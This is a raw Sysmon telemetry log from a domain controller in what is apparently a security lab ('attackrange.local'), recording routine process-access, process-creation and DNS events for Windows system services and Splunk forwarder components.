12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.900{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.681{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.886{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54223- 10341000x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 